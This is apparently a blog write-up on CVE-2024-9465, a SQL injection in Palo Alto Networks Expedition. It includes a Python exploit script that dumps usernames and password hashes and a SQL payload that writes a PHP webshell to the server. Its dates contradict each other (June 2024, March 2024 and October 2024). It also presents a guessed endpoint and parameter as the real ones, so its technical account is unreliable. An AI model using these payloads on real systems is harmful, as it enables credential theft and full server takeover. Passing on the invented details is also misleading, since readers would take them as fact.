CVE-2024-9465 - How a Simple SQL Injection Unlocks All Secrets in Palo Alto Expedition

Author: [Exclusive Cyber Insight]
Date: June 2024

Introduction

On March 2024, a dangerous vulnerability called CVE-2024-9465 was revealed in Palo Alto Networks’ Expedition migration tool. It may sound like just "another SQL injection," but this one is severe: Any internet attacker—no password needed—can pull secrets from the Expedition database. That means usernames, hashed passwords, device configs, AND the keys to those devices. Even worse, they can create or read files on the Expedition server, turning a management tool into an attacker's golden ticket.

Let's break down how CVE-2024-9465 works, look at easy-to-understand code examples, and see how an attacker really abuses it.

What is Expedition?

Palo Alto Networks Expedition is a popular migration and troubleshooting tool for Palo Alto firewalls. Admins use it to migrate configurations, audit changes, and analyze logs.

*Expedition is usually installed as a Linux VM in private networks, but sometimes rushed or careless IT teams expose it to the internet—sometimes to make migration work "easier."*

Where’s The Problem?

A web page in Expedition doesn’t clean (sanitize) inputs from the user before building SQL queries. That means attackers can smuggle SQL commands straight into the Expedition database.

Technical details and info in the advisory:
https://nvd.nist.gov/vuln/detail/CVE-2024-9465
https://security.paloaltonetworks.com/CVE-2024-9465

Find a vulnerable web endpoint

Expedition’s web UI has routes (like /device/compare) that accept user input and run SQL queries with it.

Inject SQL via GET or POST

The endpoint takes an unsanitized parameter (let’s call it id). An attacker sends a value that tricks the app into running their SQL.

Download Secrets

By injecting the right SQL, attackers pull down tables with usernames, hashed passwords, firewall device configs, and API keys.

Write or Read Files

By abusing database commands (like INTO OUTFILE or LOAD DATA INFILE), attackers can cause files to be created or exfiltrated from the Expedition system.

Here's a basic Python snippet to exploit the vulnerable endpoint

import requests

# Suppose Expedition is reachable at https://vulnerable-expedition.example.com
url = 'https://vulnerable-expedition.example.com/device/compare'

# Simple SQLi payload: Pull all usernames and password hashes
payload = " OR 1=1 UNION SELECT username, password_hash, NULL, NULL FROM users;-- "

params = {
    'id': payload  # the vulnerable parameter
}

# Disable SSL warnings for testing purposes only
requests.packages.urllib3.disable_warnings()

r = requests.get(url, params=params, verify=False)
print(r.text)  # The sweet, sweet data

This would dump usernames and password hashes to whoever sent the request!

Disclaimer: Don’t attack systems you don’t own. This is for demonstration only.

Exploit Details: File Access

If the backend database user has high privileges (sadly, this is common!), attackers can also read or create files with SQL tricks like:

UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';--

This would drop a webshell to the Expedition server, leading to a full system hijack.

How Bad Is This?

* Attackers don’t need a password.
* Impact: Full database leak and control over the Expedition server.
* From there: Attacker can jump to any firewalls or network devices managed by Expedition, using stolen API keys or configurations.

Real-world Impact

Scenario:
An attacker spots an internet-exposed Expedition server belonging to a major company.
With CVE-2024-9465, they leak the list of firewalls, configuration files, and device credentials.
They then use this info to connect directly to the company’s critical firewalls… or to implant backdoors for a later attack.
*In hours or even minutes, a whole network can be compromised from a single misconfigured management tool.*

How to Fix It?

Palo Alto released updates addressing CVE-2024-9465.
*If you're running Expedition (any version older than the fixed ones):*

Patch immediately:

Get the latest Expedition version here.

Audit for file-based backdoors:

Look for strange new files or unexpected changes in /var/www/html.

References & Further Reading

- CVE-2024-9465 in NVD
- Palo Alto Advisory
- Expedition Project
- SQL Injection Attacks Explained, OWASP

Conclusion

CVE-2024-9465 is yet another reminder: Even "just management tools" can be a hacker's easiest way in. A single, bad SQL injection can spill all your secrets and hand the keys to your network directly to attackers.

*Patch fast, audit your exposures, and always treat internal tools as critical as your main firewalls. Because for an attacker, they are.*

Timeline

Published on: 10/09/2024 17:15:20 UTC
Last modified on: 11/15/2024 14:39:34 UTC